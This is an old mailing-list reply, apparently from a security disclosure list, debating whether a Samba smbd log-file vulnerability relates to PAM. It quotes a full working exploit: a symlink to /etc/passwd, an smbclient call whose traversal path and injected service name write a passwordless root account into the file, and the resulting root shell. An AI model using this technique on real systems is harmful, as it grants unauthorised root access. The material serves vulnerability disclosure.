Re: smbd remote file creation vulnerability

[Joachim Blaabjerg <styx () mailbox as>]

Pavol Luptak <wilder () hq alert sk> wrote:

> [wilder@lysurus wilder]$ cat /etc/redhat-release 
> Linux Mandrake release 8.0 (Traktopel) for i586
> [wilder@lysurus wilder]$ rpm -q pam
> pam-0.74-6mdk
> [wilder@lysurus wilder]$ egrep "log file" /etc/smb.conf
> # this tells Samba to use a separate log file for each machine
>    log file = /var/log/samba/%m.log    (= changed from default log.%m)
> # Put a capping on the size of the log files (in Kb).
> [wilder@lysurus wilder]$ rpm -qf /usr/sbin/smbd
> samba-2.0.9-1.3mdk
> [wilder@lysurus wilder]$ ln -s /etc/passwd /tmp/x.log
> [wilder@lysurus wilder]$ smbclient //localhost/"`perl -e '{print
"\ntoor::0:0::/:/bin/sh\n"}'`" -n ../../../tmp/x -N
> added interface ip=10.0.0.43 bcast=10.0.0.255 nmask=255.255.255.0
> Anonymous login successful
> Domain=[UI42] OS=[Unix] Server=[Samba 2.0.9]
> [wilder@lysurus wilder]$ tail /etc/passwd
> ..
> ..
> [2001/06/25 18:46:48, 1] smbd/reply.c:reply_sesssetup_and_X(927)
>   Rejecting user 'wilder': authentication failed
> [2001/06/25 18:46:48, 0] smbd/service.c:make_connection(213)
>   ../../../tmp/x (127.0.0.1) couldn't find service 
>   toor::0:0::/:/bin/sh
> [wilder@lysurus wilder]$ su toor
> [root@lysurus wilder]#
>
> Appending to /etc/passwd has nothing to do with pam.

No, not directly, but if your `su` uses PAM to authenticate users and PAM
reacts to the spaces in the beginning of the passwd file, it surely has
something to do with PAM. To check whether `su` uses PAM or not, try "ldd
`which su`|grep libpam"
 
<snip>

Regards

-- 
Joachim Blaabjerg
styx () mailbox as 
www.SuxOS.org